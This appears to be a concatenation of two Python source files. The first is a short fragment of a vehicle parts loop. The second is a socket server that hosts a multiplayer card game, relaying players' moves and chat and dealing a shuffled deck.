self.stop()
def update_parts(self):
"""
loop over all parts
"""
for entry in self.parts:
# don't run if there is a run condition that is False
run = True
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
# print('run_condition', entry['part'], entry.get('run_condition'), run)
if run:
p = entry['part']
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
def stop(self):
logger.info('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except Exception as e:
logger.debug(e)
|
server.py
|
import socket
import threading
import select
import time
from message import Message
from instructions import Instruction
from cards import Deck
class Server:
MAX_CONCURRENT_REQUESTS = 4
UPDATE_FREQUENCY = 1000
SEND_RATE = 50
class Flags:
SHUTDOWN_SERVER = 1
def __init__(self, address, verbose=True):
self.ip, self.port = address
self.verbose = verbose
self.sock = self.setup_socket()
self.__flags = 0
self.__inst_queue = []
self.__client_sockets = []
self.__client_info = {}
self.__client_send_queue = {}
self.__game_running = False
self.__curr_client_id = 0
self.__decks = []
def setup_socket(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self.ip, self.port))
if self.verbose:
print(f"Set up socket on {self.ip}:{self.port}.")
return s
def start_server(self):
self.sock.listen(Server.MAX_CONCURRENT_REQUESTS)
if self.verbose:
print("Starting server...")
self.__inst_queue.append(lambda: print("Server started successfully."))
listen_t = threading.Thread(target=self.listen, daemon=True)
console_t = threading.Thread(target=self.console, daemon=True)
listen_t.start()
console_t.start()
self.run()
if self.verbose:
print("Shutting down server...")
self.sock.close()
listen_t.join(1)
console_t.join(0.1)
if self.verbose:
print("Server shut down successfully.")
def run(self):
while not self.__flags & Server.Flags.SHUTDOWN_SERVER:
while self.__inst_queue:
self.__inst_queue.pop(0)()
self.handle_client_channels()
def listen(self):
while not self.__flags & Server.Flags.SHUTDOWN_SERVER:
try:
client_socket, address = self.sock.accept()
except socket.timeout:
pass
except Exception as e:
raise e
else:
self.__inst_queue.append(lambda: self.accept_new_client(client_socket, address))
def accept_new_client(self, client_socket, address):
if self.verbose:
print(f"Connection from {':'.join(map(str, address))}")
if self.__game_running:
print("Rejecting client; game already running.")
client_socket.sendall(Message.new_send_message(Instruction.Update.GAME_RUNNING.encode("utf-8")).encode())
client_socket.close()
return
self.__client_sockets.append(client_socket)
self.__client_info[client_socket.getpeername()] = {"id": self.__curr_client_id}
self.__client_send_queue[client_socket.getpeername()] = []
self.__curr_client_id += 1
def handle_client_channels(self):
# read any incoming requests from the clients
read_sockets, _, _ = select.select(self.__client_sockets, [], [], 1 / Server.UPDATE_FREQUENCY)
for s in read_sockets:
message = Message.new_recv_message()
buffer = s.recv(Message.BUFFER_SIZE)
if not buffer:
if self.verbose:
print(f"{s.getpeername()[0]} disconnected.")
self.__client_sockets.remove(s)
del self.__client_send_queue[s.getpeername()]
continue
while not message.decode(buffer):
buffer = s.recv(Message.BUFFER_SIZE)
self.decode_instruction(s.getpeername(), message.message.decode("utf-8"))
# send any outgoing messages to the clients
for s in self.__client_sockets:
while self.__client_send_queue[s.getpeername()]:
message = self.__client_send_queue[s.getpeername()].pop(0)
s.sendall(message.encode())
# if self.__client_send_queue[s.getpeername()]:
# time.sleep(1.0 / Server.SEND_RATE)
def decode_instruction(self, client, message):
operands = []
if ":" in message:
instruction, operand = message.split(":", 1)
in_string = False
cur_operand = ""
for c in operand:
if c == "'":
in_string = not in_string
else:
if in_string:
cur_operand += c
elif c == ":":
operands.append(cur_operand)
cur_operand = ""
operands.append(cur_operand)
else:
instruction = message
if instruction == Instruction.SET_PROPERTY:
assert len(operands) == 2
self.__client_info[client][operands[0]] = operands[1]
if operands[0] == "name":
player_joined_message = Message.new_send_message(
f"{Instruction.Update.PLAYER_JOINED}:'{operands[1]}'".encode("utf-8")
)
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(player_joined_message)
if instruction == Instruction.Game.PICKUP_CARD:
assert len(operands) == 1
pickup_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(pickup_message)
if instruction == Instruction.Game.PLACE_CARD:
assert len(operands) == 2
src_deck = self.__decks[int(operands[0])]
dst_deck = self.__decks[int(operands[1])]
dst_deck.add_card_to_top(src_deck.take_top())
place_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(place_message)
if instruction == Instruction.Game.MOVE_ENDED:
ended_message = Message.new_send_message(Instruction.Game.MOVE_ENDED.encode("utf-8"))
for c in self.__client_send_queue:
if c == client:
continue
self.__client_send_queue[c].append(ended_message)
if instruction == Instruction.Game.CALL_MONGOOSE:
mongoose_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
self.__client_send_queue[c].append(mongoose_message)
if instruction == Instruction.Update.CHAT_MESSAGE:
chat_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
self.__client_send_queue[c].append(chat_message)
if instruction == Instruction.Game.FLIP_DECK:
flip_message = Message.new_send_message(message.encode("utf-8"))
for c in self.__client_send_queue:
self.__client_send_queue[c].append(flip_message)
if instruction == Instruction.Update.QUIT_GAME:
if self.verbose:
print(f"Player {self.__client_info[client]['name']} left the game.")
del self.__client_info[client]
def console(self):
while not self.__flags & Server.Flags.SHUTDOWN_SERVER:
i = input()
if i.lower() in ("q", "quit", "shutdown"):
self.__flags |= Server.Flags.SHUTDOWN_SERVER
self.__inst_queue.append(lambda: print(f"Shutting down server..."))
elif i.lower() in ("h", "help"):
self.__inst_queue.append(Server.help)
elif i.lower() in ("s", "start"):
self.__inst_queue.append(self.start_game)
def start_game(self):
curr_id = 0
for c in self.__client_info:
self.__client_info[c]["id"] = curr_id
curr_id += 1
p_names = [f"'{self.__client_info[c]['name']}':'{self.__client_info[c]['id']}'" for c in self.__client_info]
game_deck = Deck.full()
game_deck.shuffle()
suit_map = {"Spades": "0", "Diamonds": "1", "Clubs": "2", "Hearts": "3"}
deck_str = ":".join([f"'{suit_map[card.suit]}-{card.value}'" for card in game_deck.cards])
send_deck = f"{Instruction.Game.SEND_DECK}:{deck_str}"
for c in self.__client_sockets:
self.__client_send_queue[c.getpeername()].append(Message.new_send_message(send_deck.encode("utf-8")))
c_id = self.__client_info[c.getpeername()]["id"]
message_text = Instruction.START_GAME + f":'{c_id}':" + ":".join(p_names)
message = Message.new_send_message(message_text.encode("utf-8"))
self.__client_send_queue[c.getpeername()].append(message)
player_decks = game_deck.deal(len(self.__client_sockets))
# setup the decks in the order that each player will hold their IDs
for d in player_decks:
self.__decks.append(d)
self.__decks.append(Deck.empty())
for i in range(4):
self.__decks.append(Deck.empty())
self.__inst_queue.append(lambda: print(f"Starting game with: {', '.join(p_names)}"))
self.__game_running = True
@staticmethod
def help():
print("q, quit, shutdown - Shutdown the server")
print("s, start - Start the game")
print("h, help - Show the help message")
def stop_server(self):
self.sock.close()
def main():
# this user has run the server script directly, so they are intending to host
ip = input("Enter host IP> ")
port = int(input("Enter host port> "))
server = Server((ip, port))
server.start_server()
if __name__ == "__main__":
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.